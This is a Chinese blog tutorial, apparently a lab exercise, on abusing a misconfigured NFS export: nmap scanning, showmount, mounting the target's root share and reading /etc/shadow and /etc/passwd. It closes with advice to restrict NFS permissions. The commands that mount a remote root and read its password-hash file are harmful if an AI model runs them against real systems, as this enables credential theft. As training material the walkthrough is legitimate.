6-19漏洞利用-nfs获取目标密码文件

已于 2022-07-27 20:15:18 修改
阅读量1.2k 收藏 5
点赞数
分类专栏: 网络安全训练营 文章标签: 网络 服务器 运维
于 2022-07-26 14:56:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53008479/article/details/125994898
版权

在这里插入图片描述

nfs介绍

NFS(Network File System)即网络文件系统,是FreeBSD支持的文件系统中的一种,它允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS的应用中,本地NFS的客户端应用可以透过TCP/IP通道透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。

它和smb效果类似,但是它的协议是不同的,我们可以通过nmap探测目标IP地址,查看是否开启了NFS服务,nfs一般是2049端口

nmap 192.168.1.105

在这里插入图片描述

nmap -p 2049 -sV 192.168.1.105

在这里插入图片描述

探测它的具体信息,运行TCP端口,nfs服务,以及版本

我们已经知道目标开启了NFS,这个时候,我们就要开始利用nfs进行文件读取

探测目标nfs
nmap --script=nfs-* IP
//星号加载所有有关于nfs探测的脚本,来探测对应目标的IP地址

在这里插入图片描述

我们返回过程中,通知是通过rpcbind 111端口,来进行返回,nfs-showmount显示可以通过命令的逃出,以及它的权限,它目录下的内容,nfs-statfs显示它的大小、使用率

nmap --script=nfs-* 192.168.42.137

在这里插入图片描述

探测nfs是否可以导出

除了可以使用nmap判断nfs是否可以导出,我们还可以使用showmount命令确定“/”共享(文件系统的根)是否可以导出到本地。可能需要安装nfs-common包才能使用"showmount"命令

apt-get install nfs-common
//安装nfs-common包

在这里插入图片描述

showmount -e IP

在这里插入图片描述

/*表示根目录下的内容,都可以导出

查看导出内容
mkdir nfs_root
//确定要导出新建的内容
mount -t nfs IP地址:/ ~/nfs_root -o nolock
//-o nolock不加任何处理,直接输出
cat ~/nfs_root/etc/shadow

mkdir nfs_root
cd nfs_root/
mount -t nfs 192.168.42.137:/ ~/nfs_root -o nolock
cat ~/nfs-root/etc/shadow
cat ~/nfs-root/etc/passwd

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

我们成功的利用了nfs配置,导出了对应的信息,进行本地读取,由此,我们发现nfs配置不当,会导致很大的隐患,因为它可以读取,我们公用系统的所有内容,我们要对nfs进行严格的限制,使得,我们不能够读取任意文件,只能读取固定的分享的文件,一定要做好权限控制

山兔1
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞挖掘】——87、NFS未授权访问利用
Fly_鹏程万里
06-13 215
NFS(Network File System,网络文件系统)是FreeBSD支持的文件系统中的一种,它允许网络中的计算机之间通过TCP/IP网络共享资源,在NFS的应用中本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件就像访问本地文件一样,如今NFS具备了防止被利用导出文件夹的功能,但遗留系统中的NFS服务配置不当,则仍可能遭到恶意攻击者的利用。
Kali网络安全终极教程
07-05
1、本课程着重分享Kali Linux渗透测试从基础学习到实战操作教程!2、本课程致力于帮助学员学习、Kali Linux环境搭建、系统操作及其实战技巧!
NFS不安全的配置漏洞
weixin_46564680的博客
10-13 2173
NFS不安全的配置漏洞 NFS简述: 网络文件系统(英语:Network File System,缩写作 NFS)是一种分布式文件系统,力求客户端主机可以访问服务器端文件,并且其过程与访问本地存储时一样,允许网络上的用户以类似于本地存储的方式访问共享文件夹。 NFS服务的默认开放端口2049/TCP。 漏洞检测: NFS不安全配置漏洞检测可以通过漏洞扫描工具发现 Nessus漏洞报告详情 使用NMAP检测漏洞 使用NMAP扫描发现目标开放2049端口 查看nmap自带的和NFS相关的
metasploitable2靶场_超级超级详细的~
lmxstjghhh的博客
07-10 1457
Metasploitable2
nfs文件共享漏洞
m0_52433710的博客
12-21 5971
什么是nfs NFS是基于UDP/IP协议的应用,其实现主要是采用远程过程调用RPC机制,RPC提供了一组与机器、操作系统以及低层传送协议无关的存取远程文件的操作。RPC采用了XDR的支持。XDR是一种与机器无关的数据描述编码的协议,他以独立与任意机器体系结构的格式对网上传送的数据进行编码和解码,支持在异构系统之间数据的传送。 漏洞复现 攻击机:Kali 靶机:Metasploitable2 首先利用nmap对靶机 进行扫描,扫描其开放的端口: ...
常见端口入侵
weixin_44110913的博客
04-15 2134
20:FTP服务的数据传输端口 21:FTP服务的连接端口,可能存在 匿名登陆 弱口令暴力破解 匿名登陆:1.用nc链接21号端口 2.直接使用USER anonymous PASS xxxx 22:SSH服务端口,可能存在 弱口令暴力破解 23:Telnet端口,可能存在 弱口令暴力破解 25:SMTP简单邮件传输协议端口,和 POP3 的110端口对应 43:whois服务端口 53:DNS服...
nfs-subdir-external-provisioner:v4.0.2 镜像文件
05-26
nfs-subdir-external-provisioner:v4.0.2 镜像文件
利用nfs共享漏洞获取系统文件
06-06
利用nfs共享漏洞获取系统文件
nfs-utils.tar.gz
07-04
3. **传输安装包**:将下载的`nfs-utils.tar.gz`文件通过FTP、SCP或其他方式传输到需要安装的目标机器上。 4. **解压安装包**:在目标机器上,进入下载目录并解压`nfs-utils.tar.gz`,例如: ``` cd /root/nfs ...
nfs服务端nfs-kernel-server,nfs-common安装包
04-27
nfs服务端nfs-kernel-server,nfs-common安装包 以及所需依赖。 NFS服务端的安装(服务器上或者服务主机上安装) NFS的安装只需要安装rpcbind与nfs-kernel-server就可以对外提供服务了。 NFS 服务都是通过 RPC 来...
ansible-role-nfs-mount:管理NFS4挂载
05-24
角色变量nfs_mount_opts :默认的NFS挂载选项nfs_version :要使用的默认NFS版本(4) nfs_share_mounts :NFS共享的字典列表: 路径:安装点位置:nfs服务器路径opts:挂载选项(可选) dump:fs转储(可选) pass...
nfs-in-docker:Docker中的NFS版本3服务器和客户端
05-18
Docker中的NFS 工作正在进行中 Docker中的NFS版本3服务器和客户端。 关于 NFS服务器和客户端的定义已使用CentOS 7作为基础进行了定义。 使用docker-compose协调两个节点的演示。 NFS服务器提供的卷可以定义为主机...
nfs-utils-1.3.0.rar_nfs-utils
09-23
《Linux系统中的NFS服务详解及nfs-utils源码解析》 在Linux系统中,网络文件系统(Network File System,简称NFS)是一项至关重要的服务,它允许不同计算机之间共享文件和目录,实现跨平台的数据交换。NFS-utils是...
nfs-utils离线安装包.zip
08-19
离线安装nfs-utils用,安装nfs-utils所需依赖也都在里面 复制到服务器后直接执行以下命令即可顺利安装: sudo rpm -ivh *.rpm --force --nodeps sudo systemctl start rpcbind sudo systemctl enable rpcbind ...
ansible-role-nfs:Ansible角色-NFS
01-31
5. **Ansible角色结构**:分析`ansible-role-nfs-master`目录结构,通常包含`defaults`, `tasks`, `handlers`, `files`, `templates`等子目录。了解每个子目录的作用,如`tasks/main.yml`存放角色的主要任务,`...
4.8、漏洞利用-NSF配置漏洞与Rpcbind信息泄露
c10udz的博客
10-29 5012
NFS(network file system):网络文件系统。Linux下三大文件系统之一,采用C/S架构。允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS应用中,本地NFS客户端可以透明的读写位于远端NFS服务器上的文件。NFS服务端机器:通过NFS协议将文件共享到网络NFS客户端机器:通过网络挂载NFS共享目录到本地补充:NFS服务器主要进程1 rpc.nfsd 进程NFS 服务的主进程,主要管理客户端是否能够接入 NFS 服务器以及数据的传输。
LINUX安全加固规范
weixin_30719711的博客
09-06 485
1 概述 近几年来Internet变得更加不安全了。网络的通信量日益加大,越来越多的重要交易正在通过网络完成,与此同时数据被损坏、截取和修改的风险也在增加。 只要有值得偷窃的东西就会有想办法窃取它的人。Internet的今天比过去任何时候都更真实地体现出这一点,基于Linux的系统也不能摆脱这个“普遍规律”而独善其身。因此,优秀的系统应当拥有完善的安全措施,应当足够...
Linux NFS共享目录配置漏洞
最新发布
m0_62670778的博客
05-11 571
使用nmap扫描靶机的IP地址,可以看到靶机的2049端口开放,且使用了nfs服务。尝试查看靶机利用NFS共享的全部文件夹:看到结果是。接下来可以利用nfs漏洞实现远程ssh无密码登录。传输成功之后再次尝试使用ssh命令连接靶机。这表示将根目录下单全部文件都共享了。,其目的就是映射共享文件夹下的根目录。将靶机上的共享文件挂载到该文件上面。在攻击机上面创建一个根文件夹。命令查看所有的本地磁盘的信息。我们尝试用ssh服务连接上靶机。在挂载成功之后我们可以通过。
iTOP-4412开发板实现NFS网络文件系统教程
本教程的目标是指导用户在iTOP-4412上设置NFS,以便通过网络挂载和访问远程主机的文件系统,提升调试效率,避免频繁地生成和烧录文件系统镜像。 要实现NFS网络文件系统,首先需要确保软硬件环境已准备就绪。这包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值